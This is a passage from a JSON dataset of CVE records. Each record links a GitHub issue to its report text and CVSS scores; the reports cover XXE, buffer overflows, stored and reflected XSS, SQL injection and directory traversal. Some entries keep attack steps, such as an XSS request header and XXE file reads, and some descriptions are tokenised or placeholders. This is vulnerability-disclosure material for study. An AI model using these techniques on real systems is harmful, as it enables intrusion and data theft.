PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG NUMBERTAG a6c9 ( PATHTAG NUMBERTAG c NUMBERTAG PATHTAG NUMBERTAG c NUMBERTAG d ( PATHTAG ) SUMMARY: APITAG stack overflow ( PATHTAG NUMBERTAG ABORTING",
  4780. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  4781. "severity": "MEDIUM",
  4782. "baseScore": 5.5,
  4783. "impactScore": 3.6,
  4784. "exploitabilityScore": 1.8
  4785. },
  4786. {
  4787. "CVE_ID": "CVE-2017-1000187",
  4788. "Issue_Url_old": "https://github.com/matthiaskramm/swftools/issues/36",
  4789. "Issue_Url_new": "https://github.com/matthiaskramm/swftools/issues/36",
  4790. "Repo_new": "matthiaskramm/swftools",
  4791. "Issue_Created_At": "2017-06-12T02:34:21Z",
  4792. "description": "pdf2swf Invalid Address Access. Crash : URLTAG url Trigger : ./pdf2swf z i w b l f G I o /den/null swftools/pdf2swf_ z_ i_ w_ b_ l_ f_ G_ I_ APITAG Crash Detail : PATHTAG ./pdf2swf z i w b l f G I o /den/null swftools/pdf2swf_ z_ i_ w_ b_ l_ f_ G_ I_ APITAG ASAN:DEADLYSIGNAL APITAG NUMBERTAG ERROR: APITAG SEGV on unknown address NUMBERTAG c (pc NUMBERTAG bc NUMBERTAG bp NUMBERTAG sp NUMBERTAG ffda NUMBERTAG c NUMBERTAG T NUMBERTAG bc NUMBERTAG PATHTAG NUMBERTAG e NUMBERTAG f6 ( PATHTAG NUMBERTAG e NUMBERTAG PATHTAG NUMBERTAG d2e2e ( PATHTAG NUMBERTAG b4ad0 ( PATHTAG NUMBERTAG da ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG f3 ( PATHTAG NUMBERTAG fca ( PATHTAG NUMBERTAG d NUMBERTAG PATHTAG NUMBERTAG d6f7 ( PATHTAG NUMBERTAG ae NUMBERTAG PATHTAG NUMBERTAG f NUMBERTAG f ( PATHTAG NUMBERTAG f2c NUMBERTAG PATHTAG NUMBERTAG fd NUMBERTAG f ( PATHTAG NUMBERTAG cef8 ( PATHTAG ) APITAG can not provide additional info. SUMMARY: APITAG SEGV ( PATHTAG NUMBERTAG ABORTING",
  4793. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  4794. "severity": "HIGH",
  4795. "baseScore": 7.8,
  4796. "impactScore": 5.9,
  4797. "exploitabilityScore": 1.8
  4798. },
  4799. {
  4800. "CVE_ID": "CVE-2017-1000190",
  4801. "Issue_Url_old": "https://github.com/ngallagher/simplexml/issues/18",
  4802. "Issue_Url_new": "https://github.com/ngallagher/simplexml/issues/18",
  4803. "Repo_new": "ngallagher/simplexml",
  4804. "Issue_Created_At": "2016-10-25T16:16:25Z",
  4805. "description": "XXE vulnerability in APITAG Hi, there. Recently, I learned about APITAG and tried my luck to find some bugs. Here is what I found. As you know, APITAG can serialize and deserialize XML document. So I tested for these functions and finally I found these can lead to an XXE vulnerability. First, I tried to inject payloads into the attributes. However, APITAG cannot resolve external entity in attribute of the element. CODETAG It will raise an exception when resolve the XML document above because APITAG cannot resolve external entity in attributes. However, external entity can be used at elements' text nodes: CODETAG When deserialize this document above, we can retrieve the content of win.ini in C disk. Also, we can use http, gopher, dict protocol in XXE attack. More details in APITAG version is NUMBERTAG Besides, Retrofit is also affected by this vulnerability because of the usage of APITAG inside. FILETAG FILETAG To fix it, you can limit the resolving of external entities in XML document. Let me know if you have problem to reproduce this issue. Thanks!",
  4806. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  4807. "severity": "CRITICAL",
  4808. "baseScore": 9.1,
  4809. "impactScore": 5.2,
  4810. "exploitabilityScore": 3.9
  4811. },
  4812. {
  4813. "CVE_ID": "CVE-2017-1000191",
  4814. "Issue_Url_old": "https://github.com/NICMx/Jool/issues/232",
  4815. "Issue_Url_new": "https://github.com/nicmx/jool/issues/232",
  4816. "Repo_new": "nicmx/jool",
  4817. "Issue_Created_At": "2016-11-10T12:22:58Z",
  4818. "description": "Kernel crash with Jool NUMBERTAG One of our SIIT DC BRs just crashed. It's an NUMBERTAG server running Ubuntu NUMBERTAG and kernel NUMBERTAG generic. This could be the hardware going faulty for all I know (it's the first time this has happened), but I'm including the oops from the serial console below. It mentions various Jool related functions, so I'm assuming you'd be interested in taking a look. ERRORTAG `",
  4819. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  4820. "severity": "HIGH",
  4821. "baseScore": 7.5,
  4822. "impactScore": 3.6,
  4823. "exploitabilityScore": 3.9
  4824. },
  4825. {
  4826. "CVE_ID": "CVE-2017-1000199",
  4827. "Issue_Url_old": "https://github.com/open-iscsi/tcmu-runner/issues/194",
  4828. "Issue_Url_new": "https://github.com/open-iscsi/tcmu-runner/issues/194",
  4829. "Repo_new": "open-iscsi/tcmu-runner",
  4830. "Issue_Created_At": "2017-07-14T15:48:00Z",
  4831. "description": "Security information leak in internal qcow handler's check_config callback. The implementation of qcow_check_config presents an information leak, because it allows any user with access to the dbus system bus to check for the existance of files and directories, even if the user shouldn't have access to those files. For example issuing this command as a regular user allows to get the knowledge, whether APITAG exists: dbus send system print reply APITAG PATHTAG APITAG PATHTAG These kind of information leaks in combination with other security issues often leverage more serious security issues. I'd have suggested a bugfix for this but it is difficult to get right. If we knew the peer credentials from dbus we could do a comparison of those credentials against the target file credentials. This still would be difficult for corner cases, where the file itself would be accessible to the user, but not some of the upper components of the path. The check_config callback does currently not provide a possibility to pass peer credential information in, so this would affect public API in some way. Also I've not found a simple way to get the dbus peer credentials via libgio, maybe by using a APITAG All quite complicated, might be easier to drop this config callback altogether.",
  4832. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  4833. "severity": "HIGH",
  4834. "baseScore": 7.5,
  4835. "impactScore": 3.6,
  4836. "exploitabilityScore": 3.9
  4837. },
  4838. {
  4839. "CVE_ID": "CVE-2017-1000212",
  4840. "Issue_Url_old": "https://github.com/tonini/alchemist-server/issues/14",
  4841. "Issue_Url_new": "https://github.com/tonini/alchemist-server/issues/14",
  4842. "Repo_new": "tonini/alchemist-server",
  4843. "Issue_Created_At": "2017-02-21T22:40:55Z",
  4844. "description": "Server executes arbitrary code from remote machines. alchemist server starts a server that executes arbitrary code from any host that you reach you on the network, without any kind of authentication. APITAG Take note of the port, because the exploit below doesn't brute force the port (though this could easily be done by an attacker). CODETAG This also works from a remote machine because alchemist server listens on all interfaces, not just localhost. Listening on localhost by default would be a good idea, but is insufficient, because it still leaves the user open to attacks from other (less trusted) users on the machine, and possibly from the user's web browser via a DNS rebinding attack. Requiring a secret cookie before accepting any requests would be a good idea (beware, though, the secret needs a constant time comparison). Even better would be to use a UNIX socket.",
  4845. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4846. "severity": "CRITICAL",
  4847. "baseScore": 9.8,
  4848. "impactScore": 5.9,
  4849. "exploitabilityScore": 3.9
  4850. },
  4851. {
  4852. "CVE_ID": "CVE-2017-1000218",
  4853. "Issue_Url_old": "https://github.com/hfiref0x/LightFTP/issues/5",
  4854. "Issue_Url_new": "https://github.com/hfiref0x/lightftp/issues/5",
  4855. "Repo_new": "hfiref0x/lightftp",
  4856. "Issue_Created_At": "2017-07-06T11:37:42Z",
  4857. "description": "Security buffer overflow. Hello, I've noticed a buffer overflow in the Unix version of APITAG This append in the \"writelogentry\" function. With this payload : APITAG With this configuration : CODETAG POC : CODETAG This buffer overflow can lead to remote code execution or a denial of service. I hope this will help you to fix the vuln.",
  4858. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4859. "severity": "CRITICAL",
  4860. "baseScore": 9.8,
  4861. "impactScore": 5.9,
  4862. "exploitabilityScore": 3.9
  4863. },
  4864. {
  4865. "CVE_ID": "CVE-2017-1000246",
  4866. "Issue_Url_old": "https://github.com/rohe/pysaml2/issues/417",
  4867. "Issue_Url_new": "https://github.com/identitypython/pysaml2/issues/417",
  4868. "Repo_new": "identitypython/pysaml2",
  4869. "Issue_Created_At": "2017-05-24T15:21:53Z",
  4870. "description": "Reuse of AES initialization vector in APITAG / APITAG / Server. The Server URLTAG class randomly generates a fixed NUMBERTAG byte initialization vector (IV) for the purpose of encrypting data. Then, via the APITAG URLTAG class, that fixed IV makes its way to the APITAG class, where it is consistently reused for encrypting data. Initialization vector reuse like this is a security concern, since it leaks information about the encrypted data to attackers, regardless of the encryption mode used. For example, if the IV is reused with the same key in AES CTR mode, the attacker will very likely be able to entirely decrypt the encrypted data: URLTAG Instead of relying on a fixed, randomly generated IV, it would be better to randomly generate a new IV for every encryption operation. Here are a couple of links that have more information on why that is the preferred approach: FILETAG URLTAG",
  4871. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  4872. "severity": "MEDIUM",
  4873. "baseScore": 5.3,
  4874. "impactScore": 1.4,
  4875. "exploitabilityScore": 3.9
  4876. },
  4877. {
  4878. "CVE_ID": "CVE-2017-1000418",
  4879. "Issue_Url_old": "https://github.com/Mindwerks/wildmidi/issues/178",
  4880. "Issue_Url_new": "https://github.com/mindwerks/wildmidi/issues/178",
  4881. "Repo_new": "mindwerks/wildmidi",
  4882. "Issue_Created_At": "2017-08-04T00:11:17Z",
  4883. "description": "heap buffer overflow in APITAG Hi. I found a heap buffer overflow in wildmidi. Please confirm. Thanks. Summary: heap buffer overflow Browser/OS: Ubuntu NUMBERTAG bit Steps to reproduce: APITAG the .POC files. APITAG the source code with APITAG or Run wildmidi as valgrind. APITAG the following command : ./wildmidi APITAG o /dev/null APITAG download : APITAG URLTAG ERRORTAG",
  4884. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  4885. "severity": "HIGH",
  4886. "baseScore": 7.8,
  4887. "impactScore": 5.9,
  4888. "exploitabilityScore": 1.8
  4889. },
  4890. {
  4891. "CVE_ID": "CVE-2017-1000420",
  4892. "Issue_Url_old": "https://github.com/syncthing/syncthing/issues/4286",
  4893. "Issue_Url_new": "https://github.com/syncthing/syncthing/issues/4286",
  4894. "Repo_new": "syncthing/syncthing",
  4895. "Issue_Created_At": "2017-08-07T05:56:43Z",
  4896. "description": "Placeholder issue. To be replaced with real content tomorrow.",
  4897. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  4898. "severity": "HIGH",
  4899. "baseScore": 7.5,
  4900. "impactScore": 3.6,
  4901. "exploitabilityScore": 3.9
  4902. },
  4903. {
  4904. "CVE_ID": "CVE-2017-1000421",
  4905. "Issue_Url_old": "https://github.com/kohler/gifsicle/issues/114",
  4906. "Issue_Url_new": "https://github.com/kohler/gifsicle/issues/114",
  4907. "Repo_new": "kohler/gifsicle",
  4908. "Issue_Created_At": "2017-08-09T18:11:53Z",
  4909. "description": "Use After Free bug in gifview (tested with the latest version NUMBERTAG When viewing a gif figure: APITAG gfi = APITAG // URLTAG > A new object gfi is allocated APITAG APITAG gfi)); // URLTAG > gfi is added into gfs >images (assuming with inde NUMBERTAG gfi >refcount increases by NUMBERTAG APITAG read_image(grr, &gfc, gfi, read_flags); // URLTAG > Try to read the image > Assuming this call fails and return NUMBERTAG due to a corrupted figure) APITAG APITAG gfs >nimages NUMBERTAG URLTAG > APITAG >images[gfs >nimages NUMBERTAG APITAG >images[gfs >nimages NUMBERTAG i.e., APITAG > gfi is freed APITAG goto done // URLTAG APITAG NUMBERTAG gfi is used multiple times after being freed. // URLTAG APITAG gfi is freed again. // URLTAG",
  4910. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4911. "severity": "CRITICAL",
  4912. "baseScore": 9.8,
  4913. "impactScore": 5.9,
  4914. "exploitabilityScore": 3.9
  4915. },
  4916. {
  4917. "CVE_ID": "CVE-2017-1000426",
  4918. "Issue_Url_old": "https://github.com/mapproxy/mapproxy/issues/322",
  4919. "Issue_Url_new": "https://github.com/mapproxy/mapproxy/issues/322",
  4920. "Repo_new": "mapproxy/mapproxy",
  4921. "Issue_Created_At": "2017-08-14T10:50:55Z",
  4922. "description": "Update demo service. TODO",
  4923. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  4924. "severity": "MEDIUM",
  4925. "baseScore": 6.1,
  4926. "impactScore": 2.7,
  4927. "exploitabilityScore": 2.8
  4928. },
  4929. {
  4930. "CVE_ID": "CVE-2017-1000428",
  4931. "Issue_Url_old": "https://github.com/flatCore/flatCore-CMS/issues/35",
  4932. "Issue_Url_new": "https://github.com/flatcore/flatcore-cms/issues/35",
  4933. "Repo_new": "flatcore/flatcore-cms",
  4934. "Issue_Created_At": "2017-08-12T14:48:20Z",
  4935. "description": "Multiple XSS (reflected and stored). Hey, I found NUMBERTAG SS in your application NUMBERTAG Reflected XSS in FILETAG / FILETAG Your FILETAG is vulnerable to reflected xss URLTAG This is because you use $_SERVER FILETAG This is verified with the github version as well as with Version NUMBERTAG Stored XSS in logfile Version NUMBERTAG from your website is also vulnerable to stored xss by the following request: GET FILETAG HTTP NUMBERTAG Host: APITAG User Agent: APITAG alert NUMBERTAG APITAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Connection: close Upgrade Insecure Requests NUMBERTAG This is triggered when the administrator opens the log view. FILETAG Cheers",
  4936. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  4937. "severity": "MEDIUM",
  4938. "baseScore": 6.1,
  4939. "impactScore": 2.7,
  4940. "exploitabilityScore": 2.8
  4941. },
  4942. {
  4943. "CVE_ID": "CVE-2017-1000433",
  4944. "Issue_Url_old": "https://github.com/rohe/pysaml2/issues/451",
  4945. "Issue_Url_new": "https://github.com/identitypython/pysaml2/issues/451",
  4946. "Repo_new": "identitypython/pysaml2",
  4947. "Issue_Created_At": "2017-09-09T09:04:08Z",
  4948. "description": "Running python with optimizations makes APITAG accept any password for any user. On the current master branch, the APITAG class relies on an assert statement to check the user's password: URLTAG The assert is supposed to raise an exception if the password doesn't match. This is insecure: running python with optimizations enabled (either via the APITAG or APITAG flags, or with the PYTHONOPTIMIZE environment variable URLTAG will remove all such assertions URLTAG . This means that no exception will be raised on an incorrect password, and the APITAG will accept any password for any user. It would be better to have an explicit check that raises an exception to avoid this problem.",
  4949. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4950. "severity": "HIGH",
  4951. "baseScore": 8.1,
  4952. "impactScore": 5.9,
  4953. "exploitabilityScore": 2.2
  4954. },
  4955. {
  4956. "CVE_ID": "CVE-2017-1000437",
  4957. "Issue_Url_old": "https://github.com/marcobambini/gravity/issues/186",
  4958. "Issue_Url_new": "https://github.com/marcobambini/gravity/issues/186",
  4959. "Repo_new": "marcobambini/gravity",
  4960. "Issue_Created_At": "2017-09-04T23:24:15Z",
  4961. "description": "Buffer Overflow (operator_string_add) . Summary: Gravity is vulnerable to a Stack Buffer Overflow in the operator_string_add function. ASAN is saying it is a \"buffer underflow\" but by looking at gravity under GDB we can see that we are gaining a arbitrary write. This opens up a security risk as a attacker can use this to write passed a static buffer and achieve code execution. Execution: ./gravity APITAG GDB: FILETAG ASAN: ERRORTAG POC: CODETAG",
  4962. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4963. "severity": "CRITICAL",
  4964. "baseScore": 9.8,
  4965. "impactScore": 5.9,
  4966. "exploitabilityScore": 3.9
  4967. },
  4968. {
  4969. "CVE_ID": "CVE-2017-1000443",
  4970. "Issue_Url_old": "https://github.com/Eleix/openhacker/issues/5",
  4971. "Issue_Url_new": "https://github.com/booth-f/openhacker/issues/5",
  4972. "Repo_new": "booth-f/openhacker",
  4973. "Issue_Created_At": "2017-09-19T17:26:42Z",
  4974. "description": "XSS, SQL Injection and logic problem in APITAG APITAG Not sanitized, used in a query later, used in a message later. SQL Injection & XSS. $details .= $_POST['details']; XSS, used in the message later. Logic problem: To deduce the amount the hacker is sending to another hacker, the amount is being multiplied by NUMBERTAG so if he's sending NUMBERTAG the game treats it as if its NUMBERTAG What happens if the original amount I sent is NUMBERTAG and it gets multiplied by NUMBERTAG It turns into a positive integer NUMBERTAG and I gain free cash.",
  4975. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  4976. "severity": "MEDIUM",
  4977. "baseScore": 6.1,
  4978. "impactScore": 2.7,
  4979. "exploitabilityScore": 2.8
  4980. },
  4981. {
  4982. "CVE_ID": "CVE-2017-1000444",
  4983. "Issue_Url_old": "https://github.com/Eleix/openhacker/issues/4",
  4984. "Issue_Url_new": "https://github.com/booth-f/openhacker/issues/4",
  4985. "Repo_new": "booth-f/openhacker",
  4986. "Issue_Created_At": "2017-09-19T17:08:48Z",
  4987. "description": "SQL Injection in APITAG As lgin.htm tries to grab the user's IP, it prioritizes HTTP_X_FORWARDED_FOR before REMOTE_ADDR. REMOTE_ADDR can be trusted not to be manipulated by the user however HTTP_X_FORWARDED_FOR is very easily manipulated. It needs validation of being a valid IP address. Look into APITAG",
  4988. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  4989. "severity": "CRITICAL",
  4990. "baseScore": 9.8,
  4991. "impactScore": 5.9,
  4992. "exploitabilityScore": 3.9
  4993. },
  4994. {
  4995. "CVE_ID": "CVE-2017-1000445",
  4996. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/775",
  4997. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/775",
  4998. "Repo_new": "imagemagick/imagemagick",
  4999. "Issue_Created_At": "2017-09-22T12:48:49Z",
  5000. "description": "Null Pointer Dereference at APITAG of APITAG Hi all, APITAG NUMBERTAG still exist in latest development branch APITAG might return NULL if APITAG fails, then it will cause Null Pointer Deference. similar suspicious code pieces might also have the same issue: URLTAG URLTAG URLTAG ERRORTAG Regards, Alex, APITAG Inc.",
  5001. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  5002. "severity": "MEDIUM",
  5003. "baseScore": 6.5,
  5004. "impactScore": 3.6,
  5005. "exploitabilityScore": 2.8
  5006. },
  5007. {
  5008. "CVE_ID": "CVE-2017-1000448",
  5009. "Issue_Url_old": "https://github.com/structured-data/linter/issues/41",
  5010. "Issue_Url_new": "https://github.com/structured-data/linter/issues/41",
  5011. "Repo_new": "structured-data/linter",
  5012. "Issue_Created_At": "2017-09-25T09:29:03Z",
  5013. "description": "The URL input doesn't check the user inputs. Hi, When I used your online tool to check the RDFa attributes of my own website, I got the following error: error ERRORTAG Failed to open APITAG No such file or directory @ rb_sysopen APITAG The problem here is that I didn't precise APITAG . Consequently, the software tried to find APITAG as a local file. This issue leads to a directory traversal attack, allowing an attacker to disclose information about the remote system. For example, it is possible to know if a directory exists or not (with APITAG as input): error Errno::EISDIR: Is a directory @ io_fread PATHTAG When used on a file which the format is not recognised by the parser, the error message tends to leak some precious information (with APITAG as input): validation PATHTAG Errors found during processing validation PATHTAG ERROR [line NUMBERTAG Lexer error: With input APITAG APITAG LTS, Trusty Tahr\" ID=ubuntu ID_LIKE=debian APITAG NUMBERTAG Invalid token \"NAME= Ubuntu \": {:production=>:statement, :token=>\"NAME= Ubuntu \"}: validation PATHTAG FATAL recovery: statement: [\".\"] For example, an attacker could use this vulnerability to reveal the installed and running services on the remote host (with APITAG as input): validation PATHTAG Errors found during processing validation PATHTAG ERROR [line NUMBERTAG Lexer error: With input 'client] port NUMBERTAG socket = PATHTAG Here is entries for some specific progr': Invalid token \"client]\": APITAG :token=>\"client]\"}: validation PATHTAG FATAL recovery: APITAG \";\" validation PATHTAG FATAL recovery: APITAG \"]\" validation PATHTAG FATAL recovery: triples: [\".\"] validation PATHTAG FATAL recovery: statement: [\".\"] We know now that the APITAG server is installed on the remote server and listens on port NUMBERTAG To check if it is currently running or not (with APITAG as input): error ERRORTAG Failed to open PATHTAG No such file or directory @ rb_sysopen PATHTAG To fix this issue, the user inputs need to be checked to ensure that they are real URL addresses and not local files.",
  5014. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  5015. "severity": "HIGH",
  5016. "baseScore": 7.5,
  5017. "impactScore": 3.6,
  5018. "exploitabilityScore": 3.9
  5019. },
  5020. {
  5021. "CVE_ID": "CVE-2017-1000450",
  5022. "Issue_Url_old": "https://github.com/opencv/opencv/issues/9723",
  5023. "Issue_Url_new": "https://github.com/opencv/opencv/issues/9723",
  5024. "Repo_new": "opencv/opencv",
  5025. "Issue_Created_At": "2017-09-26T22:19:03Z",
  5026. "description": "Out of bounds write causes Segmentation Fault. System information (version) APITAG NUMBERTAG the latest commit NUMBERTAG d NUMBERTAG Operating System / Platform => Linux Compiler => gcc Detailed description An invalid writing occurs in the APITAG and APITAG functions in PATHTAG POC URLTAG Steps to reproduce ERRORTAG Crash Details ERRORTAG",
  5027. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5028. "severity": "HIGH",
  5029. "baseScore": 8.8,
  5030. "impactScore": 5.9,
  5031. "exploitabilityScore": 2.8
  5032. },
  5033. {
  5034. "CVE_ID": "CVE-2017-1000459",
  5035. "Issue_Url_old": "https://github.com/leanote/leanote/issues/676",
  5036. "Issue_Url_new": "https://github.com/leanote/leanote/issues/676",
  5037. "Repo_new": "leanote/leanote",
  5038. "Issue_Created_At": "2017-10-17T18:41:49Z",
  5039. "description": "Multiple XSS. There are multiple XSS in markdown notes you can trigger them with following payloads CODETAG",
  5040. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  5041. "severity": "MEDIUM",
  5042. "baseScore": 6.1,
  5043. "impactScore": 2.7,
  5044. "exploitabilityScore": 2.8
  5045. },
  5046. {
  5047. "CVE_ID": "CVE-2017-1000461",
  5048. "Issue_Url_old": "https://github.com/brave/browser-laptop/issues/11683",
  5049. "Issue_Url_new": "https://github.com/brave/browser-laptop/issues/11683",
  5050. "Repo_new": "brave/browser-laptop",
  5051. "Issue_Created_At": "2017-10-26T17:26:03Z",
  5052. "description": "Fingerprinting protections bypassable. Description Many of the current fingerprinting protections rely on removing references to methods from the global object. However, you can get alternate references to the same methods by inserting a configured iframe element and grabbing the references off APITAG or APITAG . Steps to Reproduce CODETAG Actual result: You can get references to the fingerprinting related methods. Expected result: You shouldn't be able to get to these methods. Reproduces how often NUMBERTAG Brave Version All versions Reproducible on current live release: Yes",
  5053. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N",
  5054. "severity": "MEDIUM",
  5055. "baseScore": 4.7,
  5056. "impactScore": 1.4,
  5057. "exploitabilityScore": 2.8
  5058. },
  5059. {
  5060. "CVE_ID": "CVE-2017-1000462",
  5061. "Issue_Url_old": "https://github.com/BookStackApp/BookStack/issues/575",
  5062. "Issue_Url_new": "https://github.com/bookstackapp/bookstack/issues/575",
  5063. "Repo_new": "bookstackapp/bookstack",
  5064. "Issue_Created_At": "2017-10-26T19:52:01Z",
  5065. "description": "Stored Cross Site Scripting. For Bug Reports APITAG Version APITAG in settings, Please don't put 'latest') : APITAG NUMBERTAG PHP Version NUMBERTAG APITAG Version: Ver NUMBERTAG Distrib NUMBERTAG for Linu NUMBERTAG Expected Behavior Filter out JS code. Any author can write Cross site scripting payloads and cause issues for the users/ Current Behavior JS code is not filtered within the page creation Steps to Reproduce NUMBERTAG Create a book NUMBERTAG Create a page NUMBERTAG While editing the page, choose to edit the source code and add APITAG NUMBERTAG isit the page (alert box should pop up)",
  5066. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5067. "severity": "MEDIUM",
  5068. "baseScore": 5.4,
  5069. "impactScore": 2.7,
  5070. "exploitabilityScore": 2.3
  5071. },
  5072. {
  5073. "CVE_ID": "CVE-2017-1000463",
  5074. "Issue_Url_old": "https://github.com/Leafpub/leafpub/issues/125",
  5075. "Issue_Url_new": "https://github.com/leafpub/leafpub/issues/125",
  5076. "Repo_new": "leafpub/leafpub",
  5077. "Issue_Created_At": "2017-10-28T10:56:29Z",
  5078. "description": "Stored Cross site Scripting (XSS). Issue Summary Stored Cross site Scripting (XSS) in page editor causing any author to get arbitrary javascript execution on the any viewer's browser. Steps to Reproduce Tell us how to replicate the problem NUMBERTAG Log in to a user with writer permissions NUMBERTAG Choose to edit a blog post NUMBERTAG Choose to embed a resource. A side panel will appear asking you for code NUMBERTAG Enter the following payload in the side panel: APITAG , and save the blog NUMBERTAG iew the blog and observe an alert box pop up. Additional info Leafpub version NUMBERTAG PHP version NUMBERTAG Affected browsers: All that can run javascript Operating system: Ubuntu",
  5079. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  5080. "severity": "MEDIUM",
  5081. "baseScore": 5.4,
  5082. "impactScore": 2.7,
  5083. "exploitabilityScore": 2.3
  5084. },
  5085. {
